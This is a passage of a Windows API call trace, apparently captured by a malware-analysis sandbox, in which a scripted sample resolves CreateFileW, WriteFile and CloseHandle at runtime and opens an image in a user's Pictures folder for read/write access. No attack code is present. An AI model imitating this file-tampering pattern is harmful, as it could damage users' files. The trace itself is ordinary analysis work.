(HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.553] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0191.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0191.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0191.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0191.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0191.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0191.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0191.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0191.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0191.554] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0191.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0191.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.555] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0191.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0191.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0191.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0191.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e1a00 [0191.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e1a00, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0191.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0191.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0191.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0191.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0191.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0191.555] FreeLibrary (hLibModule=0x75c90000) returned 1 [0191.556] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0191.556] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0191.556] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0191.556] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0191.556] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.557] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.557] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.557] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.557] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.557] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.558] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.558] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.558] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.558] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.558] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.558] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.558] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.558] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.559] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.559] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0191.559] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0191.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0191.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba420, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0191.560] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ov_bhlk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0191.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0191.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0191.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0191.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0191.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0191.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0191.560] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.560] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0191.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0191.560] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0191.561] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0191.561] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0191.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0191.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0191.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0191.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0191.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0191.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.562] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0191.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0191.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba180 [0191.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba180, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0191.562] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.562] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0191.563] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.563] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.563] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0191.563] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0191.563] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.563] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0191.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0191.564] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0191.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0191.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd918, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0191.564] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.564] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0191.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.564] 